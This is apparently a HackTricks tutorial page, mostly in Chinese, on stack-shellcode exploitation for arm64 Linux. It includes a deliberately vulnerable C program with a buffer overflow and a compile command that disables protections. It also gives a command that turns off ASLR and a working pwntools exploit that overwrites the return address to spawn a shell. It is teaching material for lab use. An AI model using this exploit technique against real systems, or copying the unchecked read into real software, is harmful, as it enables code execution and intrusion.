2.1 KiB
Stack Shellcode - arm64
{{#include ../../../banners/hacktricks-training.md}}
有关 arm64 的介绍请参见:
{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}
Linux
代码
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
在没有 pie、canary 和 nx 的情况下编译:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
No ASLR & No canary - Stack Overflow
要停止 ASLR,请执行:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
要获取 offset of the bof check this link。
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
我打开了生成的 core 文件 (gdb ./bog ./core),并检查了 shellcode 起始位置的真实地址。
macOS
Tip
在 macOS 上无法禁用 NX,因为在 arm64 上这一模式由硬件级别实现,所以你不能禁用它,因此你不会在 macOS 中找到在 stack 上有 shellcode 的示例。
Check a macOS ret2win example in:
{{#ref}} ../ret2win/ret2win-arm64.md {{#endref}}
{{#include ../../../banners/hacktricks-training.md}}